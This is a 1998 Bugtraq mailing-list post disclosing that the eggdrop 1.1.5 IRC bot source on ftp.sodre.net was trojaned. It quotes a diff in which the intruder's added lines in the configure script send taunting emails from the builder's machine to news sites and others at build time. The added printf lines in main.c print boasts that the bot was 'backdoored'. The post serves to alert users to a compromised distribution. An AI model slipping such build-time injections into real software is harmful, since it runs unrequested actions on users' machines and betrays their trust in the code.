[8742] in bugtraq
Re: FTP.SODRE.NET Hacked... Eggdrop Modified..
daemon@ATHENA.MIT.EDU (Matt Hallacy)
Sun Dec 20 14:20:59 1998
Date: Sat, 19 Dec 1998 20:00:44 -0600
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: Matt Hallacy <poptix@INGS.COM>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <199812200300110360.01470D2A@smtp.tig.com.au>
Actually, this is not the extent of the problem.. (see below) sodre.net
was emailed, and the distribution files have been like this for over a
week now. So much for responsive admins.
diff -rc eggdrop1.1.5/configure eggdrop1.1.5+hacked/configure
*** eggdrop1.1.5/configure Sun Jun 22 21:24:23 1997
--- eggdrop1.1.5+hacked/configure Tue Nov 24 03:59:16 1998
***************
*** 1,4 ****
--- 1,16 ----
#! /bin/sh
+ # added by evil Jeremy :)
+ # lets send some email to our favorite friends
+ EMAIL="yo, Jeremy owns you.. sodre.net is OWNED FUCKERS"
+ echo $EMAIL | mail -s "sodre.net hacked" news@rootshell.com
+ echo $EMAIL | mail -s "sodre.net hacked" news@antionline.com
+ echo $EMAIL | mail -s "sodre.net hacked" mail news@zdnet.com
+ echo $EMAIL | mail -s "heheeh you guys are hung like horses" sodresux@hotmail.com
+ echo "i hate you" | mail root@citronic.net
+ #echo "Your dead fucker." | mail -s "prosecute me plz" president@whitehouse.gov
+ # we chickened out :>
+
+ # eof
# Guess values for system-dependent variables and create Makefiles.
# Generated automatically using autoconf version 2.12
***************
*** 2590,2596 ****
# This sed command replaces #undef with comments. This is necessary, for
# example, in the case of _POSIX_SOURCE, which is predefined and required
! # on some systems where configure will not decide to define it.
cat >> conftest.vals <<\EOF
s%^[ ]*#[ ]*undef[ ][ ]*[a-zA-Z_][a-zA-Z_0-9]*%/* & */%
EOF
--- 2602,2608 ----
# This sed command replaces #undef with comments. This is necessary, for
# example, in the case of _POSIX_SOURCE, which is predefined and required
! v# on some systems where configure will not decide to define it.
cat >> conftest.vals <<\EOF
s%^[ ]*#[ ]*undef[ ][ ]*[a-zA-Z_][a-zA-Z_0-9]*%/* & */%
EOF
diff -rc eggdrop1.1.5/src/main.c eggdrop1.1.5+hacked/src/main.c
*** eggdrop1.1.5/src/main.c Sun Jun 29 13:18:07 1997
--- eggdrop1.1.5+hacked/src/main.c Tue Nov 24 03:36:21 1998
***************
*** 1339,1344 ****
--- 1339,1348 ----
fatal("CANNOT FORK PROCESS.", 0);
if (xx != 0) {
printf("Launched into the background (pid: %d)\n\n", xx);
+ printf("Oh, and hi sexy losers\n");
+ printf("We like, hacked sodre and like, backdoored your eggdrop :>\n");
+ printf("Fuck you to pimpdog, and never buy shells at citronic.net\n");
+ printf("Werd to Jeremy@EFNet and visit http://www.phorce.net\n\n");
#if HAVE_SETPGID
setpgid(xx, xx);
#endif
On Sun, 20 Dec 1998, Geoffrey Huntley wrote:
> I was compiling an eggdrop today when i noticed something...
> The eggdrop source code seemed to be modified... and said stuff that shouldn't be in the code...
> and hack an url saying ftp.sodre.net was broken into... so i went and
> checked it out..
> So What do you know anyone else heard anymore on this subject?
>
>
> ftp.sodre.net hacked
> On December 13 1998 Jeremy hacked sodre.net today and replaced the eggdrop1.1.5 on ftp.sodre.net with a comical one written by ryan . ryan who wrote the eggdrop says all he did was add some printf statements to main.c and a few email commands to the configure file. ryan was in no way involved in the hack. If you view the source code you will see this:
> printf("Launched into the background (pid: %d)\n\n", xx);
> printf("Oh, and hi sexy losers\n");
> printf("We like, hacked sodre and like, backdoored your eggdrop :>\n");
> printf("Fuck you to pimpdog, and never buy shells at citronic.net\n");
> printf("Werd to Jeremy@EFNet and visit http://www.phorce.net\n\n");
>
>
> \\|//
> ___________ooO_(o"o)_OoO__________
> | (_) |
> Geoffrey Huntley | |
> Self Proposed | Sometimes the simplest things |
> Unix Freak & XT Lover | in life are often the best |
> | - Diethyl |
> diethyl@suspicion.org |___________oooO_____Oooo__________|
> talk diethyl@under.suspicion.org ( )/ ( ,)
> http://diethyl.suspicion.org \_) (_/
> ____________________________________________[iCQ# 22069278]
>
